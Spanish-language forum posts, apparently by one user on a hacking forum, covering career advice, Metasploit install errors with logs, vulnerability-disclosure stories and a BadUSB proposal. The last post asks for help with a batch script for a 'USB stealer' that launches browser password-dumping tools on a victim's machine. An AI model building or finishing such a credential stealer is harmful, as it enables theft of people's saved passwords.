Buenas, este año me toca ya elegir que voy a ser para mi futuro y ando un poco perdido, lo que mas me llama es el mundo de la informática y me gustaría estudiar ingeniería de telecomunicaciones. Al ver las competencias que esta dice que obtendrás encontré que dice: "Capacidad para aprender de manera autónoma nuevos conocimientos y técnicas adecuados para la concepción, el desarrollo o la explotación de sistemas y servicios de telecomunicación" y me ha surgido la duda al ver la palabra "explotación" sobre si estudiando este grado puedo aprender sobre hacking, a un nivel algo más avanzado que lo que me ofrece internet.
Muchas gracias

Copernico

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lo estas corriendo desde una consola?

no le des doble click, correlo desde cmd o powershell

Voy al cmd y hago:
C:/metasploit> start console.bat

luego se abre la consola de metasploit, le doy a new tab, framework tab, cierro el framework Pro.
Espero... Espero... Y nada pasa hasta que aparecen un monton de palabras ilegibles y se cierra automaticamente.
Gracias.

Copernico.

Yo he usado metasploit en windows, pero en pentestbox, así que no se por qué será el error.

Puedes probar a descargar pentestbox y usarlo ahí

Saludos.

Muchas gracias desde ahi me funciona. Una ultima duda, sabes si se pueden añadir modulos de metasploit a pentestbox?

Copernico

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lo estas corriendo desde una consola?

no le des doble click, correlo desde cmd o powershell

Voy al cmd y hago:
C:/metasploit> start console.bat

luego se abre la consola de metasploit, le doy a new tab, framework tab, cierro el framework Pro.
Espero... Espero... Y nada pasa hasta que aparecen un monton de palabras ilegibles y se cierra automaticamente.
Gracias.

Copernico.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Primero en que OS lo estas instalando, y segundo sube una imagen para ver mejor el problema

Fallo mío por las prisas, disculpe. El sistema es un windows 10 con un procesador x64.
No puedo mandar una captura ya que el error aparece con velocidad, pero estos son los logs que obtengo tras usar la función de Diagnostic Logs. Este es el Framework log

[09/02/2016 02:57:29] [d(0)] core: Already established connection to postgresql, so reusing active connection.
[09/02/2016 03:03:58] [e(0)] core: Error updating module details for exploit/linux/http/linksys_wrt160nv2_apply_exec: ActiveRecord::StatementInvalid PG::ConnectionBad: PQsocket() can't get socket descriptor: ROLLBACK
[09/02/2016 03:03:59] [e(0)] core: Error updating module details for exploit/linux/http/linksys_wrt54gl_apply_exec: ActiveRecord::StatementInvalid PG::ConnectionBad: PQsocket() can't get socket descriptor: BEGIN
[09/02/2016 03:04:00] [e(0)] core: Error in stream server server monitor: Se intentó realizar una operación en un elemento que no es un socket.

Call stack:
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/rex/socket/tcp_server.rb:46:in `accept'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/rex/socket/tcp_server.rb:46:in `accept'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/rex/io/stream_server.rb:147:in `monitor_listener'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/rex/io/stream_server.rb:70:in `block in start'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/rex/thread_factory.rb:22:in `block in spawn'
C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[09/02/2016 03:08:36] [d(0)] core: Already established connection to postgresql, so reusing active connection.

Este el Delayed work log
2016-09-02 02:52:50 +0200 Starting worker thread
2016-09-02 02:52:53 +0200 Waiting for prosvc and thin
2016-09-02 03:02:54 +0200 Prosvc and thin didn't start in 601 seconds.
2016-09-02 03:02:54 +0200 Starting delayed_job worker
2016-09-02 03:03:58 +0200 Stopping worker
2016-09-02 03:04:28 +0200 Starting worker thread
2016-09-02 03:04:32 +0200 Waiting for prosvc and thin
2016-09-02 03:12:06 +0200 Prosvc and thin started in 453 seconds
2016-09-02 03:12:06 +0200 Starting delayed_job worker

Muchas gracias por su ayuda.

Hola buenas, recién recibí un nuevo portátil y tras instalarle metasploit y abrirlo tarda un poquito en abrir el Framework y luego salen un montón de letras ilegibles, por la velocidad a la que aparecen, y se cierra la consola.
Ya es la tercera vez que lo instalo y sigue dándome problemas. Cualquier idea se agradece.

Copernico.

Hola a todos los hackers e informáticos que se mueven por el foro. Abro este tema para hablar un poco de las historias que hayáis tenido a la hora de reportar fallos de vulnerabilidad. Yo por lo general me dirijo al administrador web para intentar solucionarlo y me he llevado cada una... La más gorda fue una web que tras comentarles que tenían un fallo explotable me intentaron denunciar y me estuvieron mandando unos cuantos mails diciendo que era un criminal y sinónimos, por suerte la cosa se terminó relajando y se olvidaron de mi.
Sin embargo, no todo son malas noticias, hoy mismo he recibido un mail de una web de juegos que me gusta, y que tenía XSS, y me han respondido de maravilla y me han añadido 20.000 puntos a mi cuenta y la verdad es que esto me ha alegrado la mañana. Con gente así entran ganas de seguir buscando vulnerabilidades (y sin ellas también... ).
Me pregunto si alguien más tiene historias del estilo, espero que alguien se anime a contarlas. ¿Os han tratado bien o mal? ¿Habéis recibido recompensa o os habéis quedado en el anonimato?

Copernico.

Me parece una idea fabulosa, respecto a mis conocimientos... Sé algo de C, algo de java y algo de python pero ninguno en profundidad, aunque si lo que se pide es lo básico supongo que lo tengo. Respecto a hardaware sé algo más que de programación. Los veintemensajes... Todavia no los tengo pero supongo que no tardaré en postearlos
Me gustaría proponer el desarrollo de un badusb, que es un aparato jugosisimo para todo hacker y dificil de conseguir ultimamente... (ya no quedan apenas Phison 2303...) De modo que la unica manera de conseguir uno será desarrollarlo. En vista de que yo ya me he cargado unos pocos usbs me encantaría participar para sacar la idea adelante.

Edit.  Acabo de leer que un japonés consiguió crear un BadUsb con un phison 2307, toda la información No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Copernico.

La verdad es que no hay nada como un USB bien enchufado, pero si te interesa un metodo bastante curioso Chema Alonso publicó un trabajo en el que mediante un supuesto "proxy" espiaba a la gente conectada a el, además, le añadió al proxy malicioso la función de que cuando te metieras en facebook te apareciera un: "hola BlackHat". Es una charla interesante te dejo el video.



Es algo antigüillo pero estoy seguro de que ha día de hoy más de uno se puede poner a hacerlo.

Copernico

Hola muy buenas, estoy intentando crear un pequeñillo USB stealer (bastante simplon la verdad) pero me ha surgido el problema de que mientras terminaba de escribirlo todo me ha surgido el siguiente problema, me gustaría hacer un script que detectase si existe la carpeta de Google Chrome y si lo hace correr el archivo ChromeStealer.vbs, si no existiera esa carpeta que comprobase si existe la carpeta de FireFox y si existe que corra el archivo FireStealer.vbs y si no existen ninguna de las dos que no haga nada.
Perdón por la pregunta, sé que es muy de novato, pero es lo que tiene ser un noob.

El codigo que he escrito es el siguiente:

@echo off >Nul
IF EXIST "\Google\Chrome" (start ChromePass.exe) ELSE (echo Chrome Not found!)
IF EXIST "\Mozilla Firefox" (start PasswordFox.exe) ELSE (echo Firefox Not found!)
pause >nul
@exit /B

Me da error pese a que tengo los dos programas instalados en el pc

Copernico.

Muchas gracias.

Copernico